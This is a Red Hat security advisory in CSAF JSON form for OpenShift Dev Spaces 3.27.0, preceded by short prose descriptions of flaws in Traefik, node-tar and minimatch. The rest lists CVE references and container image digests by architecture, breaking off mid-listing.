A flaw was found in Traefik, an HTTP reverse proxy and load balancer. An unauthenticated client can exploit this vulnerability by sending a specific 8-byte Postgres SSLRequest (STARTTLS) prelude and then intentionally delaying further communication. This action bypasses Traefik's configured read timeouts, causing connections to remain open indefinitely. The primary consequence is a Denial of Service, as the server's resources become exhausted by these persistent, non-responsive connections.
A flaw was found in node-tar. An attacker can craft a malicious archive that, when extracted with default options, creates a hardlink outside the intended extraction directory. This vulnerability allows the attacker to perform arbitrary file read and write operations as the user extracting the archive, bypassing existing path protections. This can lead to unauthorized access and modification of sensitive system files.
A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Dev Spaces 3.27.0 has been released.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.\nThe 3.27 release is based on Eclipse Che 7.115 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.\nUsers still using the v1 standard should migrate as soon as possible.\nhttps://devfile.io/docs/2.2.0/migrating-to-devfile-v2\nDev Spaces supports OpenShift EUS releases v4.16 and higher. Users are expected to update to supported OpenShift releases in order to continue to get Dev Spaces updates.\nhttps://access.redhat.com/support/policy/updates/openshift#crw",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:6192",
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.27/html/administration_guide/installing-devspaces",
"url": "https://access.redhat.com/documentation/en-us/red_hat_openshift_dev_spaces/3.27/html/administration_guide/installing-devspaces"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-54386",
"url": "https://access.redhat.com/security/cve/CVE-2025-54386"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61729",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-64756",
"url": "https://access.redhat.com/security/cve/CVE-2025-64756"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-68121",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-69873",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1002",
"url": "https://access.redhat.com/security/cve/CVE-2026-1002"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22045",
"url": "https://access.redhat.com/security/cve/CVE-2026-22045"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-23745",
"url": "https://access.redhat.com/security/cve/CVE-2026-23745"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-23950",
"url": "https://access.redhat.com/security/cve/CVE-2026-23950"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24049",
"url": "https://access.redhat.com/security/cve/CVE-2026-24049"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24842",
"url": "https://access.redhat.com/security/cve/CVE-2026-24842"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25223",
"url": "https://access.redhat.com/security/cve/CVE-2026-25223"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25949",
"url": "https://access.redhat.com/security/cve/CVE-2026-25949"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26960",
"url": "https://access.redhat.com/security/cve/CVE-2026-26960"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26996",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_6192.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Dev Spaces 3.27.0 Release.",
"tracking": {
"current_release_date": "2026-04-16T11:09:08+00:00",
"generator": {
"date": "2026-04-16T11:09:08+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:6192",
"initial_release_date": "2026-03-30T15:41:48+00:00",
"revision_history": [
{
"date": "2026-03-30T15:41:48+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-30T15:41:53+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:08+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Dev Spaces 3.27",
"product": {
"name": "Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_devspaces:3.27::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Dev Spaces"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3Adf538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774070844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774448966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Ad0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774422248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3A87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774155063"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3A2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774476526"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774587761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774414236"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3Ab260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775028"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3A4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775064"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3A5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774607447"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Ade4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775544"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774228740"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774227265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774451954"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3A113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10?arch=s390x\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774143680"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774070844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774448966"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3Aca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774422248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3Ad160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774155063"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3Aff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774476526"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774587761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774414236"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3A70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775028"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3Ab47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1773775064"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Ab98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e?arch=ppc64le\u0026repository_url=registry.redhat.io/devspaces\u0026tag=1774607447"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"product_identification_helper": {
